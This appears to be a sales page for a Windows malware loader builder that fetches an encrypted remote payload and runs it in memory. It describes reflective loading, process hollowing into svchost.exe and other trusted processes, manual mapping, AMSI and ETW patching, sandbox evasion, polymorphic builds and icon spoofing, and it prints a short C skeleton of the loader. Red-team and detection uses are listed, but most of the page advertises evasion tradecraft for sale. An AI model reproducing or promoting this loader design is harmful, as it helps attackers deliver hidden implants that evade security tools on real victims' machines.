The EXE Launcher produces a native Windows executable whose only job is to fetch a remote PE payload (your real implant/tool) and run it without writing it to disk. Three primary loader strategies are available: reflective PE loading in the launcher's own process, process hollowing into a benign suspended child (e.g., svchost.exe), or manual mapping with custom IAT/relocation handling.
HTTPS endpoint serving your encrypted PE payload.
Reflective load · Process hollowing target · Manual map.
AMSI patching, ETW patching, sleep encryption, anti-debug, hostname filter.
Output: x86 or x64 native PE with custom icon & metadata.
Allocates RWX/RW+RX memory, copies sections per the PE headers, fixes relocations, resolves IAT, calls TLS callbacks, then jumps to the entrypoint. All in-process.
Spawns a benign child (svchost.exe, RegAsm.exe, notepad.exe) suspended, unmaps its image, writes payload sections, fixes context, and resumes. Payload runs under a trusted PID.
Like reflective load, but performed against a remote process; no LoadLibrary footprint. Used when the payload is a DLL rather than an EXE.
Optional in-process patches against AmsiScanBuffer and EtwEventWrite to disable those telemetry surfaces for the loaded payload.
Per-build symmetric key (AES-128/256) used to decrypt the fetched payload. URL is XOR-encoded in the binary; resolved at runtime.
Junk imports, randomized opaque control flow, string XOR keys, section name shuffling, and PE checksum re-computation. Two builds share no static SHA.
int main(void) { if (IsSandbox()) return 0; PatchAMSI(); PatchETW(); BYTE* buf = Fetch(Dec(URL_ENC, KEY)); AesDecrypt(buf, len, KEY); ReflectiveLoad(buf); // jumps to payload OEP return 0; }
| Output Format | Native Windows PE (.exe) |
|---|---|
| Delivery Mode | URL only — payload fetched over HTTPS at runtime. No local-embed mode. |
| Architectures | x86 · x64 |
| OS Compatibility | Windows 7 / 8.1 / 10 / 11 |
| Load Strategies | Reflective PE · Process Hollowing · Manual Mapping |
| Hollow Targets | svchost.exe · RegAsm.exe · notepad.exe · msbuild.exe |
| Evasion | AMSI patch · ETW patch · Sleep encryption · Anti-debug · Hostname filter |
| Networking | HTTPS fetch · Per-build AES key · Optional TLS pinning |
| Polymorphism | Imports · Control flow · String XOR · Section names · Checksum |
| Visual Spoof | Custom icon & version-info; common-app cloning options |
Test reflective load, hollowing, and AMSI/ETW patching telemetry across modern EDR products.
Use as a tiny first-stage that fetches the larger implant only when targeting succeeds.
Measure how varied sandboxes handle anti-analysis primitives, sleep encryption, and hostname filters.
Benchmark reflective vs hollowing vs manual-map performance and detection across the same target.
Study real loader internals so detections match real-world adversary tradecraft.
Drop from any Exploit Builder builder (LNK, MSC, CPL, CHM, Macro) as the final native-code stage.
All tiers include unlimited builds (x86 + x64), every load strategy, full polymorphism + evasion, and updates within the term.
Bundle option. Need multiple builders? The All Modules Bundle covers every builder + both launchers at a steep discount.
Pick a tier above or talk to us — we'll match the right configuration to your engagement.
